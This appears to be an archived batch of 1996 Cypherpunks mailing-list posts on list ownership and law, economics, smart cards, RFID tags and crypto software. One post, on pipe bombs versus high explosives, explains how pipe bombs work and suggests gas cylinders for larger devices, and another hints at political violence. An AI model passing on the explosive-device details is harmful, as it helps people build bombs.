> > both got theirs at UT Austin Law School. Both are federal lawyers and both
> > have argued before the Supreme and are currently allowed to argue before the
> > Supremes.
> 
> 
> I've deleted most of Jim's meanderings above, mostly because I'm 
> fascinated by the credentialism in the graf above.

What credentials mine or the lawyers?

> He implies, without directly saying so, that "his lawyers" have weighed 
> in on this dispute and agree with him.

Hmmm, I looked back over this and I fail to see where this interpretation
can be taken. Perhaps you as well read more than is on the page. If you
would like to address specific issues then perhaps there would be some basis
for dialog.

> Of course this is hardly likely; 
> he advances no coherent legal theory. (Except the "public forum" 
> argument, which might apply to Usenet, but not cypherpunks.)

I have advanced several coherent theories. My primary one being that if the
9th and 10th are included in Constitutional interpretation many of the
issues, such as crypto and gun ownership, become trivial issues to resolve.
As to if it applies to cpunks and other similar 'private' resources, we will
just see how the court cases fall down the road.

> This is attempted proof by credentalism. I call him on it. 

Not any more than the original comments I was responding to. Anyway, what is
yoru credentials to 'call' me on it? While it may be true that you don't
agree with my views that hardly carries the weight to dismiss those views
out of hand. You sir, are not the legal benchmark in this country. I am
simply trying to change something I see as unjust.

> Okay, Jim, what _do_ your lawyers say on this? Have you asked them? I,
> too, have an attorney, a civil liberties specialist and a graduate from
> Princeton law. So what? 

Yes, I have asked them, both. They both agree that the issues that I raise
have NOT been tested in a court of law in this country (or any other) and
that it is possible that the inclusion of the 9th and 10th in a civil liberties case
could prove quite unsettling.  They have also warned me that quite a bit of
current legal precedence is in fact against my views. I accept this, just as
the folks who fought for womens suffrage or the end to slavery fought
against societies which enacted laws and policies that while accepted by the
vast majority as the status quo were never the less wrong. If my views were
the commen standard we wouldn't be having this discussion in the first
place.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 4 Aug 1996 03:36:53 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Tolerance (fwd)
In-Reply-To: <199608030750.CAA11930@einstein>
Message-ID: <Pine.SUN.3.91.960803092648.29021A-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 3 Aug 1996, Jim Choate's dog wrote:

> Because none of these issues have ever been tested in a court
> of law...

Wrong.  Most, if not all of them have.

> ...any comments I or any other person makes (even if a lawyer)
> is simply personal opinion.

In other words, Jim thinks his legal opinion is just as good as
anyone else's.  A nice eqalitarian sentiment, but obviously
unfounded.  There is such a thing as an educated opinion, as
there are also pig ignorant opinions.

> > A.  Where does Jim get the terms of the contract he implies from
> >     the simple word "public"?...

> Public - 
> 
> of or pertaining to the people; not private...yada yada yada.

Jim thinks a dictionary definition of "private" are terms of a
contract.  Interesting.

> I first learned about the cpunks list in Mondo 2000 several
> years ago not long after I got PGP 1.0...

But, Jude was not and is not an owner of the Cypherpunks list.
Whatever she wrote (and I don't have that issue before me) in
no way binds the owner even if there were some validity to Jim's
fanciful claims about the legal requirements on "public" lists.

> I also think a court would accept that argument.

That and US$1.25 will get you coffee at the Top of the Mark.

> > B.  I'm unaware that the Cypherpunks list has ever been advertised
> >     as "public" by the list owner.  (emphasis added)
>                   ^^^^^^^^^^^^^^^^^ 
> It has appeared in many publications which are intended for
> general or 'public' distribution in every one of those
> publications it was made clear that anyone was welcome and the
> subscription address was provided.

Jim apparently thinks a person can be bound by the opinions 
expressed in a "public" forum by a third party.  Okay, in this
public forum I publically state that people (such as Jim) who 
post really dumb, psuedo-legalistic posts have to pay each list
member a buck for spamming.

> The list operators ignorance of the consequences of their
> actions...

What actions?

> in no way alleviates them of the consequences of those actions.

Mock legalese in no way alleviates Jim from the consequences
of making uneducated legal pronouncements in front of God and
everybody.

> It isn't my interpretation.

Whose interpretation is it then.  Is Jim disavowing his own
pronouncement?

> ... These issues have never been tested in a court of law in
> the US in regards to computer networks and their special
> nature.

Maybe because the issues of "public" (which Jim tells us, below,
is" a public place is someplace which is operated using public 
monies") lists do not require resorting to any "special nature" 
of computer networks and can simply be addressed by pre-existing 
legal princples covering run-of-the-mill membership organizations.

> > > > A restaurant or bookstore is a public place in that it is open
> > > > to the public.
> > > 
> > > I know of no state in the union where a bookstore, restaurant,
> > > mall, etc. is considered public.
> > 
> > Actually, it's the law in ALL states in the union since the Public 
> > Accomidations Act was enacted...

> Not in Texas. We recently passed a law (Jan. 8) which permits citizens legaly
> registered to carry concealed weapons. Because the way the law was worded it
> was made clear in many newspapers and such that the ONLY way that business
> could prohibit patrons from entering their premises with those weapons was
> because they were PRIVATE property and therefore excluded from the
> constraints of the law.

Jim does not seem to understand that the Public Accomidation Act 
is applied PRIMARILY to private property.  It is his loony-toon
sea-lawyer concepts of "public," as in public list, that are the
cause of his total misunderstanding of the legal issues here.

> [Interesting but irrelevant gun law lore elided]
> 
> Now there is one caveat that most of you will have caught. That
> is the definitions of public above. In short, we have a circular
> argument as the law is worded now. 

Duh.

> > > Legaly a public place is someplace which is operated using
> > > public monies.
> > 
> > Like the Cypherpunks list?  Citation, please.
> 
> The Cpunks list isn't a place. It is a steam of characters.

First, where is Jim's citation with regard to the definition of
a public place?  I'd like to see him support just one of his
outrages legal claims with at least a scintilla of evidence.

Second, what legal evidence does Jim have that the sender of a
stream of characters (i.e., the provider of a service--free in
this case) is under any obligation to continue to provide a forum
for people he no longer wishes to provide said forum?  

This is the crux of the issue.  Jim can get into all the side
issues he wants about gun laws and whether his dog should vote.
The question before us is, may those who run the Cypherpunks list
have the right arbitrarily throw someone off the list, even though
it be advertised as "public"?  Clearly people have been thrown off
such public lists (including, I believe, Cypherpunks).  Nothing
happened.  If Jim believes the outcome should have been otherwise,
he has the burden of proof of explaining why.  He may, of course,
again offer his odd legal opinions, uncontaminated by actual
legal knowledge, but actual recourse to the law would be a lot
more convincing.

Of course, if Jim actually comes up with something better than
his opinions, I'll be ready to address such arguments.

> ...My lawyers both got theirs at UT Austin Law School. Both are
> federal lawyers and both have argued before the Supreme and are
> currently allowed to argue before the Supremes.

Cool.  Please have them post something on this thread.  I'd love
to see their analysis of "public" list liability.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Sun, 4 Aug 1996 03:20:05 +0800
To: cypherpunks@toad.com
Subject: FYI: CTST Conference Proceedings
Message-ID: <v03007800ae2446adf096@[207.67.246.99]>
MIME-Version: 1.0
Content-Type: text/plain


I received thei week an advertisment for the 1996 CardTech/SecureTech conference proceedings.
These people have a web site at <http://www.ctst.com>, but it's really lame. 
(It doesn't contain this table of contents, for example)


Since I am not building/using/designing smart card technology right now, I won't be buying it.
However, the some of the titles caught my eye:

Does anyone have access to this kind of stuff, and would they be willing to post a summary?

Here's a (partial) TOC:

Volume 1 - Technology

Changing the face of Money
    The Legislature's Perspective on the Future of Money
    Legal and Regulatory Challenges on the Development of Digital Money
    Privacy and American Business

Introduction to Card and Identification Technology
...

Advanced Identification Technology Workshop
    ...
    Advances in Signature Verification
    A Proposed Standard for Biometric Decidability
    New Imaging Technology Enables Non-intrusive Credit Card Fraud Prevention
    Secure Private Key Generation using a Finderprint
    Photo-ID Encryption and Pattern Recognition for Counterfeit Resistance
   The Voice Password(tm) Chip Low-Cost Biometric Security
   A Direct Fingerprint Reader

Smart Card Technology Seminar
...

Magnetic Stripe Card Technology Seminar
...

Biometric Technology Seminar
...

Optical Memory Card Technology Seminar
...

RFID Technology Seminar
...

PC Card Technology Seminar
...

2-D Bar Code Technology Seminar
...


Volume 2 -- Applications

Stored Value Card Applications Seminar
...

Telecommunications Applications Seminar
...

Government Applications Seminar
    Go Beyond Security -- Build in Privacy: One Does Not Equal The Other
    ...
    A Citizen Card for Europe
    The Spanish Social Security Card Project (TASS)
    Government Cards and the Information Age

Information Security Applications Seminar
...

Physical Security Applications Seminar
...

Financial Applications Seminar
...

Retail & Loyalty Applications Seminar
...

Large Scale Identifications Seminar
    What's New in Licensing and Department Motor Vehicles Applications
    Welfare ID at the Point of Transactions Using Fingerprints & 2D Bar Codes
    INS Card Production Strategies and Initiaitives
    Counterfeiting of Cards
    Korean IC Card Market and Trends of Development and Investment
    Campus-Wide CardIssuance at the State University of New York
    National ID Programs Around the World
    Trends in National ID Programs
    The Future of Large Scale Identification Applications


Health Care Applications Seminar
...

Transportation Applications Seminar
...

University Applications Seminar
...

-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"We're not gonna take it/Never did and never will
We're not gonna take it/Gonna break it, gonna shake it,
let's forget it better still" -- The Who, "Tommy"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 4 Aug 1996 02:13:38 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: "adjust your attitude with their billy club" (fwd)
In-Reply-To: <199608030343.WAA11512@einstein>
Message-ID: <Pine.LNX.3.93.960803103512.928G-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 2 Aug 1996, Jim Choate wrote:
> fast. We are the ones your mother warned you about. Were pissed off enough
> that we aren't going to use violence and such, we intend to use your own
> system of rules against you.

     As a member of the same genereation I would like to add that the use 
of violence is not completely ruled out either.  


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 4 Aug 1996 04:07:06 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: A Libertine Question (fwd)
In-Reply-To: <199608031145.GAA12155@einstein>
Message-ID: <Pine.SUN.3.91.960803104000.29021C-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 3 Aug 1996, Jim Choate's dog wrote:

> > ...Prices rise over time because of inflation of the money 
> > supply...

> Then why didn't the costs rise at the same rate as the general
> inflation rate instead of tens of times faster?

Simple.  In a market economy, with or without inflation, relative
prices are constantly changing in response to changes in supply 
and demand, and as capital is moved among investments to maximize
return.  In an inflationary environment the result is that while
all (or at least most) prices are rising, some will rise faster
than others in the short term.  Q.E.D.

> If the cost of airline tickets matched the rise in milk then my
> gallon of milk would cost over $10 instead of the $2...
> [Jim supported his /post hoc/ argument by saying it applied to
> a lot of things, i.e., he did not address the issue, but in
> essence said /post hoc/ does not apply when there's a whole
> bunch of it.]
>
> ...It is clear that with a increase of x5 in this area and
> something like < x2 in the commodities area that something is
> at play here other than pure inflation.

Only to someone who does not understand economics.  A counter
example is the unregulated computer industry.  Prices rise very
little, if at all, and even undergo price deflation at times. 

> A straw man is where I take one situation and compare it to
> another.

Sorry, this is incorrect.  (We call that an analogy.)  The 
definition of "straw man" I used came directly from the 
dictionary.  Now you may have a "personal" definition, but I
doubt it's widely shared.  (Ref., my Lewis Carrol quote in my
exchange with the pomey.)

If there are no other questions, class is dismissed.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@ARC.unm.EDU>
Date: Sun, 4 Aug 1996 03:05:41 +0800
To: Scott McGuire <cypherpunks@toad.com
Subject: Re: Information gathering by news servers
Message-ID: <1.5.4.16.19960803171637.3b574292@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12.33 PM 8/2/96 -0400, Scott McGuire wrote:
>How much information about what someone reads can be gathered
>by a news server?  Is there an anonymous way to read a public
>news server, or would a server have to be set up intentionally
>to allow anonymous reading?

You could use the Anonymizer (http://www.anonymizer.com/) in
combination with a Web Usenet archive: Dejanews, for example.
(http://www.dejanews.com/).

===============================================================================
David Rosoff (nihongo ga sukoshi dekiru)  --------------->  drosoff@arc.unm.edu
PGP public key 0xD37692F9 -----> finger drosoff@acoma.arc.unm.edu or keyservers
0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
Do you know who's reading your email? ---> http://www.arc.unm.edu/~drosoff/pgp/
Is it a forgery? --- I have PGP signed all email and news posts since May 1996.
===============================================================================
"Relax. It's not a real alarm. They can't crack _Pentagon_ codes. Can they?" :p

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgOHcBguzHDTdpL5AQE2QAQArHuoLVA0dOJ+LddI2TumYvD/vaFrWBmI
LQ3pDNlDRHdyY7u1RouVKkJbYVTvxNZCKQyaWYMgcA38eZl52V65DFq+N11Jhwm4
egCBlOlezDjPOeTk/nK25Ojavdb8ABtqGXGRFf4GwfFBQPq2kApzi8MewYEYeCJG
HaofCy5FDWU=
=bG1v
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 4 Aug 1996 01:13:04 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: FAA to require transponders on all aircraft passengers
In-Reply-To: <v02120d1cae291f445d20@[192.0.2.1]>
Message-ID: <199608031521.LAA07776@nrk.com>
MIME-Version: 1.0
Content-Type: text


> >I thinks they have mixed their marbles....

I get enlightened:
> 
>      Micron
>      Communications intends to utilize remote intelligent
>      communications (RIC) technology developed for its MicroStamp
{}
>      small-outline integrated circuit (SOIC) plastic package. Micron
>      Communications believes that the MicroStamp integrated circuit is
>      the first wireless communications technology to integrate a
>      single-chip CMOS solution, which includes a direct sequence spread
>      spectrum (DSSS) microwave-frequency radio operating at 2.45GHz, a
>      microcontroller, and low-power static random access memory (SRAM).
>      It also contains a synchronous serial port allowing additional
>      memory expansion.


They are going to hang one of these on EVERY bag?

At what per-unit cost? 

It's all the airlines can do to get barcode labels on each piece
that geos by, much less even a credit-card-sized gadget. And how
many will they lose???

THEN think of the RFI problems.....


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 4 Aug 1996 04:37:10 +0800
To: Cerridwyn Llewyellyn <cypherpunks@toad.com
Subject: Re: A Libertine Question (fwd)
Message-ID: <2.2.32.19960803184244.00e284e4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:18 AM 8/3/96 -0700, Cerridwyn Llewyellyn wrote:

>>>      As long as you are enforcing it on everyone, I don't think you'd
have a 
>>> problem, but to force some one from cooking food for homeless people, and 
>>> allow a family barbeque, is IMO wrong.
>>
>>Not at all. Businesses have no rights, individuals do. Businesses have a
><snip>
>>Blueberries they bought at the local HEB). Individuals have a right to
>>privacy, that includes cooking themselves food without harrassment. Business
>>on the other hand are selling products of potentialy questionable quality. A
>
>I disagree with your sentiments about Business and rights, however, in this
>instance, even that wasn't the issue. Food Not Bombs is NOT a business, it's
>a not-for-profit organization that gives out (not sells) food.  They are the
>same as, I think Tim May pointed out, a Boy Scout picnic, except for the 
>homless, not the boy scouts.

They are also Anarchists.  (They are referenced on various Anarchist web
pages, among other places.)

My personal belief is that they are being prosecuted because they bill
themselves as Anarchists and not for what they are doing.  If this has been
"Society Wives Against Hunger", there would have been no problems at all.
(And probibly commendations from the local paper and civic leaders.)

Locally, people who have billed themselves as Anarchists have been monitored
by the police, harased, and arrested.  (Remember: you only deserve the
protection of the state if you do not oppose the state.)

It seems that this country is quite willing to harrass fringe political
groups when the "powers that be" feel they can get away with it.  (Which is
quite often.)
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 4 Aug 1996 04:25:53 +0800
To: Martin Minow <cypherpunks@toad.com
Subject: Re: More evidence that democracy is bunk
Message-ID: <v02120d1fae294b043d69@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:02 8/3/96, Martin Minow wrote:

>At last month's SAFE (crypto policy) conference, one of the
>legislators mentioned that someone snuck the text of the
>Fourth Amendment into the crime bill, and it was voted down
>in committee.
>
>(It would be nice to dig this out of a transcript, so it doesn't
>become an urban legand.)

I remember when this originally happened. It was on the news. But I thought
it happened in the full House. Should be in the Congressional Record.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 4 Aug 1996 04:28:49 +0800
To: Martin Minow <cypherpunks@toad.com
Subject: Re: "And who shall guard the guardians?"
Message-ID: <v02120d20ae294d6dce36@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:20 8/3/96, Martin Minow wrote:

>My understanding is that the United States is (finally) a signatory
>to the Declaration.

That doesn't matter. Violations would have to be tried by the World Court
in Den Haag. The US does not recognize decisions made there (unless it
suits their purpose).



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 4 Aug 1996 13:33:10 +0800
To: cypherpunks@toad.com
Subject: Pipe bombs vs high explosives.
Message-ID: <199608040337.UAA17682@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have any experimental information comparing an 
untamped high explosive with a pipe bomb?

A pipe bomb is a device for getting a decent explosion
out of a low explosive, such as gunpowder.

A low explosive combusts relatively slowly.  The purpose
of the pipe is to hold it together for long enough to get
decent pressure.

Homemade low explosives tend to be even more feeble 
than manufactured low explosives, because it is inadvisable
for amateurs to recorn their powder, with the result that
home made powders burn slow, whereas homemade high
explosives are just as effective as manufactured high 
explosives.

My theoretical expectation is that pipe bombs would be 
very ineffectual when compared to high explosives, 
especially using home made powders.

Note that very large pipe bombs can be made by using 
propane cylinders or compressed gas cylinders in 
place of pipes.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 4 Aug 1996 13:34:07 +0800
To: cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
Message-ID: <199608040337.UAA17692@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:48 PM 8/2/96 -0500, Declan McCullagh wrote:
> John Conyers, the ranking
> Democrat on the House Judiciary Committee, blasted Gingrich and the
> Republican leadership for "bringing a meaningless bill to the House
> floor."
>
> Conyers said to reporters at 1 pm: "It's a hoax on the American
> people. It is all bark and no bite... This bill is missing the
> important wiretapping provisions that would allow law enforcement to
> find and stop terrorists before they kill.


I remember the old days when the conservatives were the Law'n Order
guys.

(pulling my long white beard and vigorously shaking my rocking
chair)

These days when somebody dies in police custody, you automatically
know that the caring progressive lovers of the poor and oppressed
are running the city where it happened.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@ARC.unm.EDU>
Date: Sun, 4 Aug 1996 04:22:29 +0800
To: Alan Olsen <shamrock@netcom.com (Lucky Green)
Subject: Re: fbi, crypto, and defcon
Message-ID: <1.5.4.16.19960803183603.3b57cd10@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09.02 PM 8/2/96 -0700, Alan Olsen wrote:

>>Can you name another business that has comparable mark-ups?
>
>Verisign? 
>
>InterNic Domain name registration?
>
>Licence plates in Washington state?

All the money they could possibly make is peanuts compared
to the colossal rip-off of compact discs. :)

===============================================================================
David Rosoff (nihongo ga sukoshi dekiru)  --------------->  drosoff@arc.unm.edu
PGP public key 0xD37692F9 -----> finger drosoff@acoma.arc.unm.edu or keyservers
0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
Do you know who's reading your email? ---> http://www.arc.unm.edu/~drosoff/pgp/
Is it a forgery? --- I have PGP signed all email and news posts since May 1996.
===============================================================================
"Relax. It's not a real alarm. They can't crack _Pentagon_ codes. Can they?" :p

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgOXvxguzHDTdpL5AQGzyQP/cDvyqIPmlU1Gg6BE+4u4GQb/RNe6LPa8
AR8fqae+dnEMsqRBF5ChEXNwNDxXCMzxVF0xXhVytlLUonlPpKCTL5E3YZ7nrj5/
SkO0/QpnyqTH1wzb6dV9RBcSxF0+V6EWX1rbHEqfXna52qWOCjDsaH3Wno5FZGJF
O60tNSmcVcE=
=8vn1
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 4 Aug 1996 05:38:06 +0800
To: cypherpunks@toad.com
Subject: The Hazards of Reading Naughty Newsgroups at Work
Message-ID: <199608031945.MAA22460@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The following interesting article appeared on page 6 of the
August 3, 1996 Seattle Times.

  County Accuses Four of Using the Internet to Access Child Porn
  --------------------------------------------------------------

By Ronald K. Fitten
Seattle Times Staff Reporter

Four men, including two former Microsoft employees, have been charged
with allegedly using computers to access child pornography on the
Internet, said King County Prosecutor Norm Maleng.

"Traditional law-enforcement efforts against child pornography have
focused on magazines, movies, and tangible materials," Maleng said
yesterday.  "But law enforcement faces new challenges with the
emergence of new technology.  The Internet, with its millions of
international web sites, has become the new underground highway for
illegal child pornography."

The two former Microsoft engineers, Michael Seaman, 37, of Kirkland,
and Ronald Rosul Jr., 31, of Seattle, allegedly used Microsoft
computers to access and copy child pornography from the Internet,
according to prosecutors.

Microsoft said both were fired after Microsoft discovered the alleged
crimes in October 1995.

Seaman is charged with possession of child pornography.  He allegedly
used his Microsoft computer to collect more than 2,500 files of
photographs of young children in sexual poses or being sexually
abused.

Rosul is also charged with possession of child pornography.  He
allegedly used Microsoft equipment to manufacture a CD-ROM disk
containing child pornography.

Both Seaman and Rosul will be arraigned next week in King County
Superior Court.  If convicted, both could receive up to one year in
jail.

Maleng, who said police and prosecutors worked cooperatively with
Microsoft throughout the investigation, said law-enforcement officers
had confiscated computer hard drives, CD-ROMs, and printed materials
as evidence.

Microsoft spokesman Mark Murray said the company found out about the
activities of its two former employees last year and alerted police.

"We provided the police with the computers to pull up the evidence,"
Murray said.

In an unrelated case, William D. Powell, 52, or Renton, and Dwight
Hunter, 48, of Bellevue, are charged with possession of and dealing in
child pornography.

Powell, an unemployed engineer, is accused of using his home computer
to exchange child pornography with Hunter.

If convicted of both offenses, Powell, who has a warrant out for his
arrest after failing to appear at his arraignment three weeks ago,
could be sentenced to between 21 and 27 months in prison.

Hunter, an unemployed salesman, is accused of using his home computer
to exchange child pornography with Powell and of having photographs in
his computer disks of children engaged in several types of sexual
activities with adults, other children, and a dog.

Hunter will be arraigned next week.  If convicted, he could receive
almost three years in prison.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 4 Aug 1996 05:38:09 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: Let's Say "No!" to Single, World Versions of Software
Message-ID: <ae28fe2d00021004abfc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:49 AM 8/3/96, Adam Back wrote:
>Bill Frantz <frantz@netcom.com> writes:

>> Sun Microsystems - SKIP implementation, PGP v3 implementation
>
>Sun PGP v3?  Whats the story behind this item?  Are sun sponsoring PGP
>v3 development?

Derek Atkins is being paid by Sun for his work on v3, last I heard.

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sun, 4 Aug 1996 02:46:33 +0800
To: cypherpunks@toad.com
Subject: Anonymous Message Broadcast
Message-ID: <Pine.LNX.3.92.960803125401.4269B-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone implemented a simple anonymous chat system (an anonymous irc)
using the technique described in Applied Cryptography 2nd edition? I'm
speaking of the Anonymous Message Broadcast documented in section 6.3, it
begins on page 137.

Can the same system be implemented using base256 (unsigned char, 8bit ASCII)
instead of the simple on/off binary method that is described in the
explanation? How would it differ.

Thanks.

(define(RSA m e n)(list->string(u(r(s(string->list m))e n))))(define(u a)(if(>
a 0)(cons(integer->char(modulo a 256))(u(quotient a 256)))'()))(define(s a)(if
(null? a)0(+(char->integer(car a))(* 256(s(cdr a))))))(define(r a x n)(cond((=
0 x)1)((even? x)(modulo(expt(r a(/ x 2)n)2)n))(#t(modulo(* a(r a(1- x)n))n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 3 Aug 1996 23:20:46 +0800
To: Matts Kallioniemi <matts@cyberpass.net>
Subject: Re: List for crypto minus political rubbish
Message-ID: <199608031334.NAA10748@pipe3.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Aug 03, 1996 14:38:59, 'Matts Kallioniemi <matts@cyberpass.net>' wrote: 
 
>Just about everything on cryptography has already been said far too many
times.  
>Just read Applied Cryptography and be done with it. What remains to
discuss is  
>politics, psychology and marketing. How do you get people to use the  
>cryptography that already exists and how will the authorities react when
people  
>do use it. 
 
 
An exemplary air-clearing for a smoke-filled agenda; and two challenging
questions which may pose a High Noon amongst munitions-slingers. Bravo,
Matts, for cryptic concision. 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 4 Aug 1996 04:33:47 +0800
To: cypherpunks@toad.com
Subject: Re: Liberating Clipper Stuff from Mykotronx Dumpsters
In-Reply-To: <ae28445005021004823e@[205.199.118.202]>
Message-ID: <Pine.LNX.3.95.960803142858.207D-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 2 Aug 1996, Timothy C. May wrote:

> He scanned or typed this stuff he found into a text file and sent it to one
> of the earliest members of the Cypherpunks list, asking for it to be passed
> on to someone who could do something with it. A few hours later, via
> anonymous remailer posting, it went out to the several hundred subscribers
> to the Cypherpunks list at that time. (It's somewhere in the archives, such
> as they are. This would be around late April, 1993, possibly May-June.)

These files can also be found at ftp.funet.fi/mirrors/dsi/cypherpunks/clipper/
mykotronx*, as the archives are still down.

- -- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMgObhbZc+sv5siulAQEAiAQAoFJQ0vREu1gORRFIoTGvD7paTNppiIg5
OW5yL88NBUBAhR9Y6kpD53EPU1pCkkv1nVqYXIrvS5PdfIC7lCfsXRs/GG7NkZUf
BgBKzNFEHVRo4nIQA5HtSDfPL5AcH6cA5XIZiReo8VMPOmV/xQR7b2IPRxohlJCH
8ALe1MsysSs=
=LBhD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@cyberpass.net>
Date: Sat, 3 Aug 1996 22:34:58 +0800
To: cypherpunks@toad.com
Subject: Re: List for crypto minus political rubbish
Message-ID: <2.2.32.19960803123859.0034a45c@cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain


At 15:25 1996-08-02 -0500, W.K. Woelbeling wrote:
>I am looking for a source of info on crypto.  While this list is of interest
>to (many) people, I find that the amount of political ranting outweighs any
>nuggets of information concerning cryptography.  Pointers?
>
>Bill

Just about everything on cryptography has already been said far too many
times. Just read Applied Cryptography and be done with it. What remains to
discuss is politics, psychology and marketing. How do you get people to use
the cryptography that already exists and how will the authorities react when
people do use it.

Matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
